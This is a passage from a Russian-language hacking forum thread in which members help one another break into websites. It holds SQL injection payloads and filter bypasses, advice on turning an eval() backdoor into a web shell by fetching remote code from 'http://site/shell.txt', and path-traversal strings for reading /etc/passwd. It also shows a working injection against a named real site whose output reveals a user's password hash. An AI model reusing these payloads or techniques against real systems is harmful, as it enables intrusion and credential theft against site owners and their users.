Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Rubaka

    Rubaka Elder - Старейшина

    Joined:
    2 Sep 2007
    Messages:
    263
    Likes Received:
    150
    Reputations:
    28
    2Strilo4ka
    так фильтрацию обходить
     
  2. _gr34t

    _gr34t Member

    Joined:
    26 Oct 2008
    Messages:
    89
    Likes Received:
    13
    Reputations:
    5
    фильтрацию кавычек
    например если такой запрос не проходит из-за того, что кавычки фильтруются
    , то такой пройдёт
     
    1 person likes this.
  3. krypt3r

    krypt3r Elder - Старейшина

    Joined:
    27 Apr 2007
    Messages:
    1,508
    Likes Received:
    389
    Reputations:
    101
    Зачем, если можно
    Code:
    SELECT table_name FROM information_schema.tables WHERE table_schema=0x666f72756d
    
    ?
     
  4. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,138
    Reputations:
    350
    Какую? Фильтрацию чего так можно обойти?
    Господа, если не знаете что ответить или не уверены, не нужно этого делать, я уже по 100 раз всех просил об этом.

    ========================

    Strilo4ka
    Это делается для получения результата в "правильной" кодировке, и никакую фильтрацию это обойти не позволит. Ты наконец прочитаешь хоть какую-нибудь статью, или так и будет это продолжаться?
     
  5. SeNaP

    SeNaP Elder - Старейшина

    Joined:
    7 Aug 2008
    Messages:
    378
    Likes Received:
    69
    Reputations:
    20
    Как залить шелл, например WSO, если я имею такой шелл <?php eval($_GET['c']) ?>
    OC win , стоит VertrigoServ

    Почему то я замешкался вот тут:
    confgs.php?e=ls; не выводит список файлов
    confgs.php?e=pwd; тож нехочет показывать, но показывает phpinfo()
    confgs.php?e=phpinfo();
     
    #10545 SeNaP, 9 Dec 2009
    Last edited: 9 Dec 2009
  6. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    eval позволяет выполнять php-код, ls - никакого отношения к php не имеет. Вывод - нужно написать PHP-код, с помощью которого можно будет залить шелл.

    Например, если после просмотра phpinfo() там будет allow_url_include = ON, то можно так залить шелл:

    confgs.php?e=include('http://site/shell.txt');
     
  7. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    942
    Likes Received:
    817
    Reputations:
    605
    Оо ну это все понятно а если confgs.php?e=system('ls -lia /путь/какой/нибудь'); не как? :)

    ЗЫ а там вообще WIN вместо ls у него dir вроде

    старайся всегда делать Как залить шелл, например WSO, если я имею такой шелл <?php eval(stripslashes($_GET['c'])); ?> ибо MQ = On может помешать и то что написал пашкела про include('http://site/shell.txt')
    и если Magic_quotes = on то он его побреет этот запрос , или я не прав
     
    _________________________
    #10547 HAXTA4OK, 9 Dec 2009
    Last edited: 9 Dec 2009
    3 people like this.
  8. SeNaP

    SeNaP Elder - Старейшина

    Joined:
    7 Aug 2008
    Messages:
    378
    Likes Received:
    69
    Reputations:
    20
    magic_quotes_gpc On On :(
    А можно поподробние? :)
     
    #10548 SeNaP, 9 Dec 2009
    Last edited: 9 Dec 2009
  9. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    делай тогда как l1ght говорит и на будущее всегда юзай stripslashes, как сказал HAXTA4OK
     
    2 people like this.
  10. DeluxeS

    DeluxeS Member

    Joined:
    1 Aug 2009
    Messages:
    14
    Likes Received:
    82
    Reputations:
    19
    Данную ошибку выдаёт при запросе:
     
  11. Iceangel_

    Iceangel_ Elder - Старейшина

    Joined:
    9 Jul 2006
    Messages:
    496
    Likes Received:
    533
    Reputations:
    158
    Лучше евалом не бекдорить, используй альтернативные функции, типа preg_replace(), `` и т.п. . А насчет твоих вариантов, не вижу каких-либо преимуществ base64_decode, лишняя морока только... Ты ведь постом будешь отправлять команды бекдору? ;)


    Code:
    UNION+SELECT+1,2,3,4,5,6,7,8,9,unhex(hex(table_name)),11+from+ information_schema.tables--
    
    P.S. кучу раз это уже описывалось
     
    1 person likes this.
  12. eliteload

    eliteload New Member

    Joined:
    22 Oct 2009
    Messages:
    3
    Likes Received:
    1
    Reputations:
    0
    Здравствуйте.
    есть вот такой код:
    PHP:
    <?php
    $lfi 
    $_GET['lfi'];
    include (
    'page'.$lfi.'.php');
    ?>
    возможно ли в данном случае проинклудить локальный фаил?(к примеру passwd). Если да то как?

    и еще один момент:
    PHP:
    <?php
    if (file_exists('./path/'.$_GET['lfi'].'.php')) {

    include (
    './path/'.$_GET['lfi'].'.php');

    }
    ?>
    так же интересует возможность инклуда произвольного файла.
    Пытаюсь отсечь расширение с помощью %00, ? и т.п. не помогает.
     
    #10552 eliteload, 9 Dec 2009
    Last edited: 9 Dec 2009
  13. Root-access

    Root-access Elder - Старейшина

    Joined:
    18 Jun 2008
    Messages:
    194
    Likes Received:
    195
    Reputations:
    91

    ?lfi=../../../../../../../etc/passwd%00
    ИЛИ
    ?lfi=../../../../../../../etc/passwd///////[4096 раз /]///////////
     
  14. eliteload

    eliteload New Member

    Joined:
    22 Oct 2009
    Messages:
    3
    Likes Received:
    1
    Reputations:
    0
    Root-access, я так понял это ответ на первый вопрос?
    Если вы внимательно посмотрите там происходит контактация.
    Используя ваш пример на выходе получается :
    include('page../../../../../../../etc/passwd%00.php');
    что естественно вызовет ошибку. Т.к фаил page../../../../../../../etc/passwd не существует
     
    #10554 eliteload, 9 Dec 2009
    Last edited: 9 Dec 2009
  15. nightmare007

    nightmare007 New Member

    Joined:
    28 Oct 2006
    Messages:
    17
    Likes Received:
    1
    Reputations:
    0
    Здравствуйте.

    В общем есть сервачек игровой один, на его сайте вкручена система голосования. Вкручена она таким образом...

    Пройдя по ссылке:

    Вы попадаете на страничку голосования , нечего особого эта страничка не представляет, формочка куда надо вписать логин и пара кнопок.

    Внутри этой странички встроен JScript:

    PHP:
    ...
    <
    script language="javascript" type="text/javascript">
    function 
    game(){
    log=document.forms["form1"].login.value;

    window.open('http://_host_/vote/game.php?login='+log);
    window.open('http://сайт_сюда_перекидывает');
    }
    <
    script>
    ...
    <
    form name="form1">
    <
    input type="text" name="login">
    <
    input type="hidden" id="vid" name="id">
    ...
    <
    input type="button" value="Проголосовать" onclick="game()">
    ...
    значит после того как вы вписываете логин и тискаете кнопку "проголосовать", у вас открывается две страницы, одна из которых (_хттп://_host_/vote/game.php?login=логин) содержит содержит сообщение о том, что вам была вставлена кука и проголосовать повторно вы не сможете в течении "X" времени.

    Кука выглядит вот так:
    PHP:
    vote gday10
    vote gh
    :00
    vote gm
    :55
    vote gmount
    12
    Если исправить значения куки, допустим значение "vote gday" изменить с "10" на "фывфы" или на " ' " и перегрузить (_хттп://_host_/vote/game.php?login=Логин)

    то выдает страницу с следующим текстом:

    Если же перегрузить страницу без указания конкретного значения Login (_хттп://_host_/vote/game.php?login= ), то выдает страницу с таким тестом:

    изменяя значения (gday,gh,gm,gmount):
    PHP:
    vote gday10
    vote gh
    :00
    vote gm
    :55
    vote gmount
    12
    в результате страница ничем почти не изменяется, кроме первой записи:

    насколько я понимаю значения кук попадает в функцию mktime() в виде параметров, функция не может воспринять передаваемые параметры и выдает ошибку.

    Терь вопрос является ли эта вся штука уязвимостью и как эту уязвимость можно использывать, имеетли место sql-inj и можно ли как нибудь достать расс рута mysql? Можно ли как нить залить шелл?
    Пробовал через телнет конектится к серваку на 3306, оказалось что открыт удаленный доступ к MySQL.

    Насколько мне известно на серваке (Unix,little-endian).
     
  16. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    958
    Likes Received:
    527
    Reputations:
    204
    nightmare007, в куке хранится время, она не фильтруется, из-за этого ошибка. Скуля там врят ли, максимум XSS.
     
  17. keng

    keng Member

    Joined:
    9 Apr 2008
    Messages:
    60
    Likes Received:
    43
    Reputations:
    8
    Ребят, помогите докрутить:

    Code:
    http://www.fnatic.com/popups/tagwall/tagwall.php?id=57679'
    С кавычкой ошибка есть, но количество полей не подобрать, а без кавычки вообще ноль реакции на что-либо. Есть подозрение, что она слепая.
     
  18. krypt3r

    krypt3r Elder - Старейшина

    Joined:
    27 Apr 2007
    Messages:
    1,508
    Likes Received:
    389
    Reputations:
    101
    Можно крутить и как слепую. Там многострочный запрос
     
  19. Ded MustD!e

    Ded MustD!e Banned

    Joined:
    23 Aug 2007
    Messages:
    393
    Likes Received:
    694
    Reputations:
    405
    Code:
    http://www.fnatic.com/popups/tagwall/tagwall.php?id=57679'/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((version()),14)d)/**/as/**/t/**/JOIN/**/(SELECT/**/NAME_CONST((version()),14)e)b)a)/**/and/**/'1'='1
    Duplicate column name '5.0.51a-24+lenny2'

    Code:
    http://www.fnatic.com/popups/tagwall/tagwall.php?id=57679'/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((select+concat_ws(0x3a,nickname,password)+from+users+limit+1),14)d)/**/as/**/t/**/JOIN/**/(SELECT/**/NAME_CONST((select+concat_ws(0x3a,nickname,password)+from+users+limit+1),14)e)b)a)/**/and/**/'1'='1
    Duplicate column name 'snakeye:2a63eca1020db4020c46be9b5dc8de4467d00912'
     
    #10559 Ded MustD!e, 10 Dec 2009
    Last edited: 10 Dec 2009
    7 people like this.
  20. Root-access

    Root-access Elder - Старейшина

    Joined:
    18 Jun 2008
    Messages:
    194
    Likes Received:
    195
    Reputations:
    91

    Ну так можно ж еще слеш добавить в начале:

    ?lfi=/../../../../../../../etc/passwd%00

    Iceangel_: разве это изменит ситуацию?
     
    #10560 Root-access, 10 Dec 2009
    Last edited by a moderator: 10 Dec 2009
Loading...
Thread Status:
Not open for further replies.